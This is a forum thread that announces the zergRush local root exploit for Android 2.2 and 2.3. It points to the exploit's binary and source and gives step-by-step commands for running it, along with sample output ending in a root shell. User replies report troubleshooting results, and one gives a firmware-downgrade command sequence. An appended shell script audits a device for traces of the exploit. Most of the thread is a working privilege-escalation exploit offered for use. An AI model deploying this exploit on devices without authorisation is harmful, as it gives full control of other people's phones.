Revolutionary - zergRush local root 2.2/2.3 [22-10: Samsung/SE update]

ieftm

Retired Recognized Developer

Hello!

We would like to announce the public availability of the root exploit we use in Revolutionary, named zergRush.

This local root exploit should be Android-wide, across Froyo (2.2) and Gingerbread (2.3). However, this will not work on Android Honeycomb and up (3.0+).

Simultaneously, we're also releasing source code for this root exploit through our GitHub.

The binary is available from here: zergRush binary.

The exploit source is available here: Revolutionary GitHub.

Usage:

You will need adb shell to execute this exploit. We need shell permissions.
Push the binary onto /data/local/ and execute these commands in a shell:

Code:
$ chmod 755 /data/local/zergRush
$ /data/local/zergRush

The resulting output should look something like this:

Code:
[**] Zerg rush - Android 2.2/2.3 local root
[**] (C) 2011 Revolutionary. All rights reserved.

[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.

[+] Found a GingerBread ! 0x00017118
[*] Sending 149 zerglings ...
[*] Trying a new path ...
[*] Sending 149 zerglings ...
[*] Trying a new path ...
[*] Sending 149 zerglings ...
[*] Trying a new path ...
[*] Sending 149 zerglings ...
[+] Zerglings caused crash (good news): 0x401219c4 0x0054
[*] Researching Metabolic Boost ...
[+] Speedlings on the go ! 0xafd260a9 0xafd39f9f
[*] Poping 24 more zerglings
[*] Sending 173 zerglings ...

[+] Rush did it ! It's a GG, man !
[+] Killing ADB and restarting as root..enjoy!

*reconnect adb shell*

Code:
# id
uid=0 gid=0

That is all folks!

Update 20-10-2011: zergRush has been updated to include some support for Sony Ericsson phones, updates for Samsung coming soon!
Update 22-10-2011: updates for Samsung phones, get the new download (or build yourself)
 

Deleted member 4244585

Guest
Does this work on the Evo 3D with Hboot1.5?
 

ingro

Senior Member
Very cool script, even though I really hate lings rush, as I'm a Protoss player :p
 

dapaua

Senior Member
Reboot?

It worked on my HTC ChaCha. Then I remounted System as rw. And then after a while (about 30 secs), my device rebooted.
I tried it twice, after deleting /data/local/tmp/*
Is it normal? My device is S-ON.

Edit: I found it, it is because I modified the system partition; after the reboot it was as before.
Thank you.
 

qzem

Senior Member
It is not working on my new Samsung w i8150, with Gingerbread 2.3.5 :(. But thanks for your work anyway!

I've got something like (if someone might be willing to help):

Zerglings haven't found anything interesting...

I can post screenshot later.
 

qzem

Senior Member
Here is a screenshot of what I get when trying this method. Anyone who could solve this?
 

Attachment: zergRush.png

attn1

Inactive Recognized Developer
What can I do with that? I'm not being sarcastic, I'm curious what the next steps would be? My goal is to be able to flash a rom/kernel and not lose root after rebooting.

downgrade to .97?

Yeah, here's how:

Code:
adb shell rm -r /data/local/tmp/*
adb push zergRush /data/local/tmp/zergRush
adb push misc_version /data/local/tmp/misc_version
adb shell chmod 777 /data/local/tmp/zergRush
adb shell chmod 777 /data/local/tmp/misc_version
adb shell /data/local/tmp/zergRush
adb shell /data/local/tmp/sh -c '/data/local/tmp/misc_version -s 2.18.605.3'
adb reboot bootloader
fastboot oem rebootRUU
fastboot erase cache
fastboot flash zip RUU_Vivo_W_Gingerbread_S_VERIZON_WWE_2.18.605.3_Radio_1.09.01.0622_NV_VZW1.92_release_199487_signed.zip
fastboot reboot

a little kit for it - http://forum.xda-developers.com/showthread.php?t=1298990
 

Top Liked Posts

I have tried the most recent zergRush on my Vizio VTAB 1008 running Gingerbread 2.3.2 and this exploit did not work. Here is the complete output which I ran in manual mode.

$ ./zergRush

[**] Zerg rush - Android 2.2/2.3 local root
[**] (C) 2011 Revolutionary. All rights reserved.

[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.

[+] Found a GingerBread ! 0x00015118
[*] Scooting ...
[*] Sending 149 zerglings ...
[+] Zerglings found a way to enter ! 0x10
[+] Overseer found a path ! 0x000151e0
[*] Sending 149 zerglings ...
[+] Zerglings caused crash (good news): 0x40119cd4 0x0054
[*] Researching Metabolic Boost ...
[+] Speedlings on the go ! 0x8001a737 0x8003a4bf
[*] Popping 24 more zerglings
[*] Sending 173 zerglings ...

[-] Bad luck, our rush did not succeed :(

I did notice that other earlier versions of zergRush had been tried on this tablet but none succeeded in rooting it.

Is it possible to modify the exploit so that it could succeed on this device? Or is it possible that this vulnerability has been patched and will not succeed at all?

Any help provided by anyone will be HUGELY appreciated. If this helps, I do have the Android source code installed and am able to compile this from source code as needed.

All other exploits have failed on this tablet. I have tried rageagainstthecage, gingerbreak, etc. It is difficult to believe that Vizio has made such a secure tablet with no exploitable vulnerabilities.

Thanks again... Getting desperate...

New version updated to fix this problem, check the GIT ;)
Getting "[-] Cannot copy boomsh.: Permission denied" from the shell when attempting to run zergRush on HTC Amaze. This was the 2nd time running on this phone after a reboot. The 1st time was successful, however my wife pulled me away so I couldn't finish what I wanted to do with root. No, I'm not going to divorce her over this. :)

Code:
macpro:platform-tools $ /android/platform-tools/adb push /android/temp/zergRush /data/local/zergRush
2076 KB/s (21215 bytes in 0.009s)
macpro:platform-tools $ /android/platform-tools/adb shell
$ chmod 755 /data/local/zergRush
$ /data/local/zergRush

[**] Zerg rush - Android 2.2/2.3 local root
[**] (C) 2011 Revolutionary. All rights reserved.

[**] Parts of code from Gingerbreak, (C) 2010-2011 The Android Exploid Crew.

[-] Cannot copy boomsh.: Permission denied
$ macpro:platform-tools $

You may need to create /data/local/tmp first.
Also, if you've already run this once, you might need to clean up this directory - remove boomsh/sh.
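As an added example (not code from this thread or from Revolutionary), a small audit helper that checks a device over adb for the two traces this thread gives away: the leftover files under /data/local and /data/local/tmp named in the reply above (zergRush, boomsh, sh) and an adbd that, as the first post describes, has been restarted as root. The file paths and the presence of `test` in the device shell are assumptions.

```shell
#!/bin/sh
# Added audit helper, not from the thread or from Revolutionary.
# Looks for the footprint this thread describes after a zergRush run:
#   - the binary and its droppings (zergRush, boomsh, sh) under /data/local[/tmp]
#   - adbd answering as root ("id" reporting uid=0)

# Drop locations named in the thread. Assumption: stock paths, not renamed copies.
ZERG_PATHS="/data/local/zergRush /data/local/tmp/zergRush /data/local/tmp/boomsh /data/local/tmp/sh"

# classify_id ID_OUTPUT -> prints "root" when adbd answers as uid 0, else "shell".
classify_id() {
    case "$1" in
        uid=0\ *|uid=0\(*|uid=0) echo root ;;
        *) echo shell ;;
    esac
}

# count_residue LIST -> number of ZERG_PATHS that appear in LIST,
# where LIST is a newline-separated list of paths that exist on the device.
count_residue() {
    n=0
    for p in $ZERG_PATHS; do
        if printf '%s\n' "$1" | grep -qxF -- "$p"; then
            n=$((n + 1))
        fi
    done
    echo "$n"
}

# check_device: run both checks against the connected device (needs adb in PATH
# and a device shell with `test`). Returns non-zero when either trace is present,
# so it can gate a larger script.
check_device() {
    id_out=$(adb shell id 2>/dev/null | tr -d '\r')
    existing=$(for p in $ZERG_PATHS; do
                   adb shell "test -e $p && echo $p" 2>/dev/null
               done | tr -d '\r')
    priv=$(classify_id "$id_out")
    files=$(count_residue "$existing")
    echo "adbd privilege: $priv"
    echo "zergRush files present: $files"
    [ "$priv" = shell ] && [ "$files" -eq 0 ]
}
```

Run `check_device` with a device attached; a clean device prints `shell` and `0`.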
Anyone that might still find use in this exploit should have a look at DooMLoRD's Easy Rooting Toolkit which uses the zergRush exploit